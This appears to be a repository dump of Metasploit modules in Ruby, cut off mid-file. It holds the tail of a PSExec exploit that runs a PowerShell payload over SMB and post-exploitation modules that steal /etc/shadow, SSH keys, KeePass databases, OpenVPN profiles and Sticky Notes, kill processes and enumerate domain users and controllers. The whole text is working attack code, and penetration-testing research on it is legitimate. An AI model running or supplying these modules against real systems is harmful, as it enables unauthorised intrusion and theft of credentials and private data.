33 | }, 34 | 35 | 'Author' => [ 36 | 'Royce @R3dy__ Davis ', # PSExec command module 37 | 'RageLtMan MSF_LICENSE, 40 | 'Privileged' => true, 41 | 'DefaultOptions' => 42 | { 43 | 'WfsDelay' => 10, 44 | 'EXITFUNC' => 'thread' 45 | }, 46 | 'Platform' => 'win', 47 | 'Targets' => 48 | [ 49 | [ 'Windows x86', { 'Arch' => ARCH_X86 } ], 50 | [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] 51 | ], 52 | 'DefaultTarget' => 0, 53 | 'DisclosureDate' => 'Jan 01 1999', 54 | 'References' => [ 55 | [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) 56 | [ 'OSVDB', '3106'], 57 | [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], 58 | [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], 59 | [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] 60 | ] 61 | )) 62 | 63 | register_options([ 64 | OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]), 65 | ], self.class) 66 | end 67 | 68 | def exploit 69 | command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) 70 | if datastore['DryRun'] 71 | print_good command.inspect 72 | return 73 | end 74 | 75 | if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] 76 | print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") 77 | end 78 | 79 | # Try and authenticate with given credentials 80 | if connect 81 | begin 82 | smb_login 83 | rescue StandardError => autherror 84 | fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") 85 | end 86 | # Execute the powershell command 87 | print_status("#{peer} - Executing the payload...") 88 | begin 89 | return psexec(command) 90 | rescue StandardError => exec_command_error 91 | fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") 92 | ensure 93 | disconnect 94 | end 95 | end 96 | 
end 97 | 98 | def peer 99 | return "#{rhost}:#{rport}" 100 | end 101 | end 102 | 103 | -------------------------------------------------------------------------------- /modules/post/linux/q/passwd-shadow-ssh-jacker-meterpreter.rb: -------------------------------------------------------------------------------- 1 | # $Id: passwd-shadow-ssh-jacker-meterpreter.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/common' 13 | require 'msf/core/post/file' 14 | require 'msf/core/post/linux/priv' 15 | require 'msf/core/post/linux/system' 16 | 17 | 18 | class Metasploit3 < Msf::Post 19 | 20 | include Msf::Post::Common 21 | include Msf::Post::File 22 | include Msf::Auxiliary::Report 23 | include Msf::Post::Linux::Priv 24 | include Msf::Post::Linux::System 25 | include Msf::Post::Unix 26 | def initialize(info={}) 27 | super( update_info( info, 28 | 'Name' => 'Linux Important Data Jacker', 29 | 'Description' => %q{ 30 | This module will download /etc/passwd /etc/shadow and try to find SSH keys and download them 31 | }, 32 | 'License' => MSF_LICENSE, 33 | 'Author' => [ 'balgan ','SSH based on ohdae module', ], 34 | 'Version' => '$Revision: 3195e713 $', 35 | 'Platform' => [ 'linux'], 36 | 'SessionTypes' => [ 'meterpreter'] 37 | )) 38 | end 39 | 40 | 41 | def execute(cmd) 42 | output = cmd_exec(cmd) 43 | return output 44 | end 45 | 46 | def run 47 | print_status("Attempting to steal information it will be saved in loot folder") 48 | jack_etc() 49 | get_ssh_keys() 50 | end 51 | 52 | def cat_file(filename) 53 | print_status("Download: #(unknown)") 54 | output = read_file(filename) 55 | return output 56 | end 57 | 58 | def get_ssh_keys 59 | i = 0; 60 | dirs = 
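execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n")
    if dirs.empty?
      print_status("COULD NOT FIND .SSH, might be permissions issue")
      return
    end

    print_status("Found SSH AT: #{dirs}")
    dirs.each do |d|
      files = execute("/bin/ls -a #{d}").chomp.split
      files.each do |f|
        next if f =~ /^(\.+)$/   # skip "." and ".."
        print_status("Trying to extract: #{f} from #{d}")
        # The file is read once through the meterpreter channel; the old
        # extra read_file() call (whose result was never used) is gone.
        data = ""
        filesaving = nil
        begin
          filesaving = session.fs.file.new("#{d}/#{f}", "rb")
          until filesaving.eof?
            data << filesaving.read
          end
          store_loot("#{f}", "application/octet-stream", session, data, f, "loot #{f}")
        rescue ::StandardError => e
          # StandardError only: Interrupt and the other non-standard
          # exceptions propagate instead of being swallowed by `::Exception`.
          print_error("Failed to download #{f}: #{e.class} #{e}")
        ensure
          # release the remote handle even when the read fails part-way
          filesaving.close if filesaving
        end
      end
    end
  end

  # Downloads /etc/passwd and /etc/shadow into loot.  A file that cannot be
  # stat'ed (e.g. /etc/shadow without root) is skipped with the others still
  # attempted; the old `return` stopped at the first missing file.
  def jack_etc()
    filestojack = ["/etc/passwd", "/etc/shadow"]
    filestojack.each do |f|
      print_status("Looking for: #{f}")
      found = session.fs.file.stat(f) rescue nil
      next unless found
      data = ""
      filesaving = nil
      begin
        filesaving = session.fs.file.new(f, "rb")
        until filesaving.eof?
          data << filesaving.read
        end
        store_loot("#{f}", "application/octet-stream", session, data, f, "loot #{f}")
      rescue ::StandardError => e
        print_error("Failed to download #{f}: #{e.class} #{e}")
      ensure
        filesaving.close if filesaving
      end
    end
  end
end

--------------------------------------------------------------------------------
/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb:
--------------------------------------------------------------------------------
# $Id$

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.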
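# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/post/linux/system'


class Metasploit3 < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Auxiliary::Report
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Unix

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Linux Important Data Jacker - Shell Version',
      'Description'   => %q{
        This module will download /etc/passwd /etc/shadow and try to find SSH keys and download them
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'balgan ','SSH Based on Jim Halfpenny'],
      'Version'       => '$Revision$',
      'Platform'      => [ 'linux'],
      'SessionTypes'  => [ 'shell']
    ))
  end

  # Entry point: grabs the account files first, then any SSH key material.
  def run
    print_status("Attempting to steal information")
    jack_etc()
    get_ssh_keys()
  end

  # Reads /etc/passwd and /etc/shadow over the shell session and stores each
  # as loot.  An empty read (typically /etc/shadow without root) is reported
  # and skipped instead of being stored as an empty loot entry.
  def jack_etc()
    filestojack = ["/etc/passwd", "/etc/shadow"]
    filestojack.each do |file|
      print_status("Downloading #{file} -> #{file}")
      data = read_file(file)
      if data.nil? || data.empty?
        print_error("Nothing read from #{file} (missing or not readable with the current privileges)")
        next
      end
      store_loot("ssh.#{file}", "text/plain", session, data,"ssh_#{file}", "File #{file}")
    end
  end

  # Looks for a .ssh directory under every user home directory and downloads
  # whatever it contains.  The per-directory loop continues below.
  def get_ssh_keys()

    print_status("Finding .ssh directories")
    paths = enum_user_directories.map {|d| d + "/.ssh"}
    paths = paths.select { |d| directory?(d) }
    if paths.empty?
      print_error("COULD NOT FIND .SSH, might be permissions issue")
    else
      paths.each do |path|
        path.chomp!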
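# `ls -1` gives one entry per line; the regexp copes with either line ending.
        files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
        files.each do |file|
          print_status("Downloading #{path}/#{file} -> #{file}")
          data = read_file("#{path}/#{file}")
          store_loot("ssh.#{file}", "text/plain", session, data,"ssh_#{file}", "OpenSSH #{file} File")
        end
      end
    end
  end
end
--------------------------------------------------------------------------------
/modules/post/unstable/enum_users.rb:
--------------------------------------------------------------------------------
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

# Multi platform require
require 'msf/core/post/common'
require 'msf/core/post/file'

require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File

  include Msf::Post::Windows::Registry

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Enumerate Domain Users',
      'Description'   => %q{
        This module will enumerate users included in the 'Domain Users' group for the primary Domain.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Joshua Abraham '],
      'Platform'      => [ 'win'],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  # Run Method for when run command is issued: resolves the domain from the
  # registry and, if there is one, lists the members of "Domain Users".
  def run
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
    domain = get_domain()

    if not domain.empty?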
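dom_users = list_domain_group_mem("Domain Users")
      list_group_members(domain, dom_users)
    end
  end

  # Lists the members of a domain group by parsing `net groups "<group>" /domain`.
  #
  # The command prints a header, a dashed divider, the member names (several
  # per line, whitespace separated) and a "The command completed
  # successfully." trailer.  Only the text after the divider is parsed, and
  # only when that trailer is present; any other output (an error message, a
  # localized Windows whose divider or trailer differ) yields an empty list.
  # The old code dereferenced the missing second half with `nil =~ ...`,
  # which raises on current Ruby.  Names are split on whitespace, so a member
  # name containing a space comes back as two entries -- a limitation of the
  # text parsing that is not addressed here.
  #
  # @param group [String] domain group name, e.g. "Domain Users"
  # @return [Array<String>] member account names, empty when nothing parsed
  def list_domain_group_mem(group)
    divider = "-------------------------------------------------------------------------------\r\n"
    raw = client.shell_command_token("net groups \"#{group}\" /domain").to_s
    member_text = raw.split(divider, 2)[1]
    return [] unless member_text && member_text =~ /The command completed successfully/

    member_text.sub(/The command completed successfully\./, '').split(" ")
  end

  # Derives the domain name from the DCName value under the Group Policy
  # History key and upper-cases its second dot-separated label (for a value
  # like "\\dc1.corp.example.com" that is "CORP").
  # NOTE(review): this only holds for a DC named <host>.<domain>.<tld>; a
  # deeper DNS hierarchy would pick the wrong label -- confirm before relying
  # on it.
  #
  # @return [String] the domain, or "" when the value is missing or not
  #   shaped as expected (the host is then reported as not domain-joined)
  def get_domain()
    domain = ""
    begin
      subkey = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History"
      v_name = "DCName"
      domain_dc = registry_getvaldata(subkey, v_name)
      # a nil value or a single-label name raises here and is reported below
      dom_info = domain_dc.split('.')
      domain = dom_info[1].upcase
    rescue ::StandardError
      print_error("This host is not part of a domain.")
    end
    return domain
  end

  # Prints a (Domain, Group, Member) table for the given member names.
  #
  # @param domain [String] domain name shown in the first column
  # @param dom_users [Array<String>] member names, one row each
  def list_group_members(domain,dom_users)
    tbl = Rex::Ui::Text::Table.new(
      'Header'  => "List of Domain Users for the primary Domain.",
      'Indent'  => 1,
      'Columns' =>
      [
        "Domain",
        "Group",
        "Member",
      ])
    dom_users.each do |user|
      tbl << [domain, "Domain Users", user]
    end
    print_line("\n" + tbl.to_s + "\n")
  end
end
--------------------------------------------------------------------------------
/modules/post/unstable/keepass_jacker.rb:
--------------------------------------------------------------------------------
# $Id: keepass_jacker.rb 2012-05-01 rapid7 $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.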
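# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'



class Metasploit3 < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Keepass Database Finder',
      'Description'   => %q{
        This module downloads any keepass kdbx files that it finds
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'balgan ', 'klinzter ' ],
      'Version'       => '$Revision: 3195e713 $',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  # Stops KeePass, then walks every profile's "My Documents" and Desktop
  # folders and downloads each file whose name contains ".kdbx" (matched
  # case-insensitively, so "Passwords.KDBX" is found too).
  #
  # The profiles are enumerated once and both folders are visited in one
  # pass (the old code called grab_user_profiles twice).  A folder that
  # cannot be listed is reported and skipped instead of aborting the run.
  def run
    print_status("Checking All Users Documents Folders For Keepass Files...")
    print_status("Attempting to kill keepass")
    kill_keepass()

    profiles = grab_user_profiles()
    ['MyDocs', 'Desktop'].each do |key|
      profiles.each do |user|
        dir = user[key]
        next if dir.nil?
        print_status("Searching #{dir}")
        begin
          files = client.fs.dir.entries(dir)
        rescue ::StandardError => e
          print_error("Unable to list #{dir}: #{e.class} #{e}")
          next
        end
        files.each do |f|
          next unless f.to_s.downcase.include?(".kdbx")
          jack_keepass(dir + "\\" + f)
        end
      end
    end
  end


  # Reads the database at +filename+ through the meterpreter file channel
  # and stores it as loot; the read loop and the store continue below.
  #
  # @param filename [String] full Windows path of the .kdbx file
  def jack_keepass(filename)
    print_status("Downloading: #{filename}")
    begin
      path = filename
      data = ""
      filesaving = session.fs.file.new(path, "rb")
      until filesaving.eof?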
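data << filesaving.read
      end
      # Store once the whole file has been read: the old call sat inside the
      # loop and wrote a partial copy of the database on every read() chunk.
      store_loot("KEEPASS.kdbx", "text/plain", session, data, filename, "loot #{path}")
    ensure
      # release the remote handle even if the read fails part-way
      filesaving.close if filesaving
    end
  end

  # Terminates every running keepass.exe (name compared case-insensitively)
  # so the database is not held open while it is read.  A kill that fails is
  # reported instead of being silently discarded by `rescue nil`.
  def kill_keepass
    client.sys.process.get_processes().each do |x|
      next unless x['name'].to_s.downcase == "keepass.exe"
      print_status(" Keepass Process Found...")
      print_status(" Killing Process PID #{x['pid']}...")
      begin
        session.sys.process.kill(x['pid'])
      rescue ::StandardError => e
        print_error(" Unable to kill PID #{x['pid']}: #{e.class} #{e}")
      end
    end
  end
end
--------------------------------------------------------------------------------
/modules/post/unstable/kill_by_name.rb:
--------------------------------------------------------------------------------
##
# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post


  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Kill running processes by PID or name',
      'Description'   => %q{ This module will kill all PIDs matching PIDLIST and/or find
        every process matching the namelist, then kill them. Current session
        PID is ignored, and a whitelist can be passed.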
24 | }, 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 'RageLtMan'], 27 | 'Version' => '$Revision$', 28 | 'Platform' => [ 'win' ], 29 | 'SessionTypes' => [ 'meterpreter'] 30 | )) 31 | 32 | register_options( 33 | [ 34 | OptString.new('PIDLIST', [false, 'List of comma separated PIDs to kill.', '']), 35 | OptString.new('NAMELIST',[false, 'List of comma separated names to kill', '']) 36 | ], self.class) 37 | 38 | register_advanced_options( 39 | [ 40 | OptString.new('IGNORE_LIST', [false, 'List of comma separated PIDs to keep.', '']), 41 | ], self.class) 42 | end 43 | 44 | # Run Method for when run command is issued 45 | def run 46 | unless client.platform =~ /win/ 47 | print_error("This module requires native Windows meterpreter functions not compatible with the selected session") 48 | return 49 | end 50 | 51 | print_status("Running module against #{sysinfo['Computer']}") 52 | 53 | pids = datastore['PIDLIST'].split(',').map {|x| x.to_i} 54 | namelist = datastore['NAMELIST'].split(',').map {|n| n.strip} 55 | keep_pids = datastore['IGNORE_LIST'].split(',').map {|x| x.to_i} 56 | 57 | if (pids.empty? and namelist.empty?) 58 | print_error("Names or PIDS must be entered") 59 | return 60 | end 61 | 62 | if namelist and !namelist.empty? 
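running = client.sys.process.get_processes
      namelist.each do |name|
        # Exact, case-sensitive match on the image name, as before; one name
        # may resolve to several processes.  The process list is fetched once
        # rather than once per name.
        running.select { |p| p['name'] == name }.each do |process|
          vprint_good("Adding #{process['name']} with PID #{process['pid']}")
          pids << process['pid'].to_i
        end
      end
    end

    # Suicide prevention and ignore list.  uniq so a PID named both in
    # PIDLIST and through NAMELIST is not killed twice (the second attempt
    # would fail on a process that is already gone).
    pids = (pids - keep_pids - [client.sys.process.getpid]).uniq

    pids.each do |pid|
      vprint_good("Killing #{pid}")
      begin
        client.sys.process.kill(pid)
      rescue ::StandardError => e
        # one process that cannot be killed should not abort the rest
        print_error("Unable to kill #{pid}: #{e.class} #{e}")
      end
    end

  end


end

--------------------------------------------------------------------------------
/modules/post/unstable/openvpn_profiles_jack.rb:
--------------------------------------------------------------------------------
# $Id: keepass_jacker.rb 2012-05-01 rapid7 $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'

class Metasploit3 < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'OpenVPN Profile Downloader',
      'Description'   => %q{
        This module downloads OpenVPN Profiles that can be imported into the OpenVPN client to automatically connect to a VPN.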
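},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'balgan '],
      'Version'       => '$Revision: 3195e713 $',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  # Picks the OpenVPN Client profile directory for the reported architecture,
  # checks that it can be listed and hands it to jack_openvpnprofiles.
  #
  # Only the directory listing is guarded by the rescue: a failure while
  # downloading a profile is reported by jack_openvpnprofiles itself and no
  # longer surfaces as a misleading "Path seems invalid".  The two identical
  # branches of the old code, differing only in the path, were collapsed.
  #
  # NOTE(review): the non-x86 branch assumes a 32-bit OpenVPN client under
  # "Program Files (x86)" on every 64-bit host -- confirm against a 64-bit
  # client install.
  def run
    arch = client.sys.config.sysinfo["Architecture"]
    print_status("Checking if folder exists...")
    if arch == "x86"
      dir = "C:\\Program Files\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\"
    else
      dir = "C:\\Program Files (x86)\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\"
    end

    begin
      session.fs.dir.entries(dir)
    rescue ::StandardError
      print_error("Path seems invalid: #{dir}")
      return nil
    end

    jack_openvpnprofiles(dir)
  end

  # Downloads every entry of +folder+ (except "." and "..") into loot.
  # Each file is read through the meterpreter file channel; a failed
  # download is reported and the next entry is tried.  The remote handle is
  # closed whether or not the read succeeds.
  #
  # @param folder [String] Windows path of the profile directory, with a
  #   trailing backslash (entries are appended to it directly)
  def jack_openvpnprofiles(folder)
    print_status("OpenVPN Profiles Folder Found at: #{folder}")
    print_status("Retrieving Profile Files...")
    files = client.fs.dir.entries(folder)
    print_status("#{files}")
    files.each do |f|
      next if f =~ /^(\.+)$/   # skip "." and ".."
      path = folder + f
      print_status("CURRENT PATH #{path}")
      data = ""
      filesaving = nil
      begin
        filesaving = session.fs.file.new(path, "rb")
        until filesaving.eof?
          data << filesaving.read
        end
        store_loot("#{f}", "text/plain", session, data, f, "loot #{path}")
      rescue ::StandardError => e
        # StandardError only; Interrupt and friends propagate as they should
        print_error("Failed to download #{path}: #{e.class} #{e}")
      ensure
        filesaving.close if filesaving
      end
    end
  end

end
--------------------------------------------------------------------------------
/modules/post/windows/q/keepass_jacker.rb:
--------------------------------------------------------------------------------
# $Id$

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions.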
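# Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'

class Metasploit3 < Msf::Post

  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Keepass Database Finder',
      'Description'   => %q{
        This module downloads any keepass kdbx files that it finds
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'balgan ',
        'klinzter '
      ],
      'Version'       => '$Revision$',
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  # Stops KeePass, then walks every profile's "My Documents" and Desktop
  # folders and downloads each file whose name contains ".kdbx" (matched
  # case-insensitively, so "Passwords.KDBX" is found too).
  #
  # The profiles are enumerated once and both folders are visited in one
  # pass (the old code called grab_user_profiles twice).  A folder that
  # cannot be listed is reported and skipped instead of aborting the run.
  def run
    print_status("Checking All Users Documents Folders For Keepass Files...")
    print_status("Attempting to kill keepass")

    kill_keepass()

    profiles = grab_user_profiles()
    ['MyDocs', 'Desktop'].each do |key|
      profiles.each do |user|
        dir = user[key]
        next if dir.nil?
        print_status("Searching #{dir}")
        begin
          files = client.fs.dir.entries(dir)
        rescue ::StandardError => e
          print_error("Unable to list #{dir}: #{e.class} #{e}")
          next
        end
        files.each do |f|
          next unless f.to_s.downcase.include?(".kdbx")
          jack_keepass(dir + "\\" + f)
        end
      end
    end
  end


  # Reads the database at +filename+ through the meterpreter file channel
  # and stores it as loot; the read loop and the store continue below.
  #
  # @param filename [String] full Windows path of the .kdbx file
  def jack_keepass(filename)
    print_status("Downloading: #{filename}")
    begin
      path = filename
      data = ""
      filesaving = session.fs.file.new(path, "rb")
      until filesaving.eof?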
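data << filesaving.read
      end
      # Store once the whole file has been read: the old call sat inside the
      # loop and wrote a partial copy of the database on every read() chunk.
      store_loot("KEEPASS.kdbx", "text/plain", session, data, filename, "loot #{path}")
    ensure
      # release the remote handle even if the read fails part-way
      filesaving.close if filesaving
    end
  end

  # Terminates every running keepass.exe (name compared case-insensitively)
  # so the database is not held open while it is read.  A kill that fails is
  # reported instead of being silently discarded by `rescue nil`.
  def kill_keepass
    client.sys.process.get_processes().each do |x|
      next unless x['name'].to_s.downcase == "keepass.exe"
      print_status(" Keepass Process Found...")
      print_status(" Killing Process PID #{x['pid']}...")
      begin
        session.sys.process.kill(x['pid'])
      rescue ::StandardError => e
        print_error(" Unable to kill PID #{x['pid']}: #{e.class} #{e}")
      end
    end
  end
end

--------------------------------------------------------------------------------
/modules/post/windows/q/openvpn_profiles_jack.rb:
--------------------------------------------------------------------------------
# $Id$

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'

class Metasploit3 < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'OpenVPN Profile Downloader',
      'Description'   => %q{
        This module downloads OpenVPN Profiles that can be imported into the OpenVPN client to automatically connect to a VPN.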
23 | }, 24 | 'License' => MSF_LICENSE, 25 | 'Author' => [ 'balgan '], 26 | 'Version' => '$Revision$', 27 | 'Platform' => [ 'windows' ], 28 | 'SessionTypes' => [ 'meterpreter' ] 29 | )) 30 | end 31 | 32 | def run 33 | arch = client.sys.config.sysinfo["Architecture"] 34 | print_status("Checking if folder exists...") 35 | if arch == "x86" 36 | dir = "%programfiles%\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 37 | begin 38 | session.fs.dir.entries(dir) 39 | jack_openvpnprofiles(dir) 40 | rescue 41 | print_error("Path seems invalid: #{dir}") 42 | return nil 43 | end 44 | else 45 | dir = "%programfiles%\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 46 | begin 47 | session.fs.dir.entries(dir) 48 | jack_openvpnprofiles(dir) 49 | rescue 50 | print_error("Path seems invalid: #{dir}") 51 | return nil 52 | end 53 | 54 | end 55 | end 56 | 57 | def jack_openvpnprofiles(folder) 58 | print_status("OpenVPN Profiles Folder Found at: #{folder}") 59 | print_status("Retrieving Profile Files...") 60 | files = [""] 61 | files = client.fs.dir.entries(folder) 62 | print_status("#{files}") 63 | files.each do |f| 64 | begin 65 | path = folder + f 66 | print_status("CURRENT PATH #{path}") 67 | data = "" 68 | next if f =~/^(\.+)$/ 69 | begin 70 | filesaving = session.fs.file.new(path, "rb") 71 | until filesaving.eof? 72 | data << filesaving.read 73 | end 74 | store_loot("#{f}", "text/plain", session, data, f, "loot #{path}") 75 | rescue ::Interrupt 76 | raise $! 
77 | rescue ::Exception => e 78 | print_error("Failed to download #{path}: #{e.class} #{e}") 79 | end 80 | end 81 | end 82 | end 83 | 84 | end 85 | -------------------------------------------------------------------------------- /modules/post/windows/q/stickynotes-jacker.rb: -------------------------------------------------------------------------------- 1 | # $Id: keepass_jacker.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | class Metasploit3 < Msf::Post 15 | include Msf::Auxiliary::Report 16 | include Msf::Post::Windows::UserProfiles 17 | 18 | def initialize(info={}) 19 | super( update_info( info, 20 | 'Name' => 'Windows 7 Sticky Notes Downloader', 21 | 'Description' => %q{ 22 | This module downloads the file that contains Sticky Notes in windows 7 23 | }, 24 | 'License' => MSF_LICENSE, 25 | 'Author' => [ 'balgan '], 26 | 'Version' => '$Revision: 3195e713 $', 27 | 'Platform' => [ 'windows' ], 28 | 'SessionTypes' => [ 'meterpreter' ] 29 | )) 30 | end 31 | 32 | def run 33 | print_status("Checking if folder exists...") 34 | dir = "%appdata%\\Microsoft\\Sticky Notes\\" 35 | begin 36 | session.fs.dir.entries(dir) 37 | jack_stickynotesfiles(dir) 38 | rescue 39 | print_error("Path seems invalid: #{dir}") 40 | return nil 41 | end 42 | end 43 | 44 | def jack_stickynotesfiles(folder) 45 | print_status("Sticky notes found at: #{folder}") 46 | print_status("Retrieving Sticky Notes Files...") 47 | files = [""] 48 | files = client.fs.dir.entries(folder) 49 | print_status("#{files}") 50 | files.each do |f| 51 | begin 52 | path = folder + f 53 | print_status("CURRENT PATH #{path}") 54 | data = "" 55 | next if f =~/^(\.+)$/ 56 | begin 57 
| filesaving = session.fs.file.new(path, "rb") 58 | until filesaving.eof? 59 | data << filesaving.read 60 | end 61 | store_loot("#{f}", "text/plain", session, data, f, "loot #{path}") 62 | rescue ::Interrupt 63 | raise $! 64 | rescue ::Exception => e 65 | print_error("Failed to download #{path}: #{e.class} #{e}") 66 | end 67 | end 68 | end 69 | end 70 | 71 | end -------------------------------------------------------------------------------- /scripts/getdomains.rb: -------------------------------------------------------------------------------- 1 | #structure 2 | =begin 3 | NET_API_STATUS NetServerEnum( 4 | __in_opt LPCWSTR servername, 5 | __in DWORD level, 6 | __out LPBYTE *bufptr, 7 | __in DWORD prefmaxlen, 8 | __out LPDWORD entriesread, 9 | __out LPDWORD totalentries, 10 | __in DWORD servertype, 11 | __in_opt LPCWSTR domain, 12 | __inout_opt LPDWORD resume_handle 13 | ); 14 | =end 15 | 16 | client.railgun.add_function('netapi32', 'NetServerEnum', 'DWORD',[ 17 | ['PWCHAR','servername','in'], 18 | ['DWORD','level','in'], 19 | ['PDWORD','bufptr','out'], 20 | ['DWORD','prefmaxlen','in'], 21 | ['PDWORD','entriesread','out'], 22 | ['PDWORD','totalentries','out'], 23 | ['DWORD','servertype','in'], 24 | ['PWCHAR','domain','in'], 25 | ['PDWORD','resume_handle','inout'] 26 | ]) 27 | 28 | domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000 29 | buffersize = 500 30 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) 31 | print_status("Finding the right buffersize...") 32 | while result['return'] == 234 33 | print_status("Tested #{buffersize}, got #{result['entriesread']} of #{result['totalentries']}") 34 | buffersize = buffersize + 500 35 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) 36 | end 37 | 38 | count = result['totalentries'] 39 | print_status("#{count} domain(s) found.") 40 | startmem = result['bufptr'] 41 | 42 | base = 0 43 | domains = [] 44 | mem = 
client.railgun.memread(startmem, 8*count) 45 | count.times{|i| 46 | x = {} 47 | x[:platform] = mem[(base + 0),4].unpack("V*")[0] 48 | nameptr = mem[(base + 4),4].unpack("V*")[0] 49 | x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join 50 | domains << x 51 | base = base + 8 52 | } 53 | 54 | domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL) 55 | 56 | domains.each do |x| 57 | print_status("Enumerating DCs for #{x[:domain]}") 58 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) 59 | while result['return'] == 234 60 | buffersize = buffersize + 500 61 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) 62 | end 63 | if result['totalentries'] == 0 64 | print_error("No Domain Controllers found...") 65 | next 66 | end 67 | 68 | count = result['totalentries'] 69 | startmem = result['bufptr'] 70 | 71 | base = 0 72 | x[:dc] = [] 73 | mem = client.railgun.memread(startmem, 8*count) 74 | count.times{|i| 75 | t = {} 76 | t[:platform] = mem[(base + 0),4].unpack("V*")[0] 77 | nameptr = mem[(base + 4),4].unpack("V*")[0] 78 | t[:dc_hostname] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join 79 | x[:dc] << t 80 | base = base + 8 81 | print_status(t[:dc_hostname]) 82 | } 83 | end -------------------------------------------------------------------------------- /scripts/getsessions.rb: -------------------------------------------------------------------------------- 1 | def read_session_struct(startmem,count) 2 | base = 0 3 | netsessions = [] 4 | mem = client.railgun.memread(startmem, 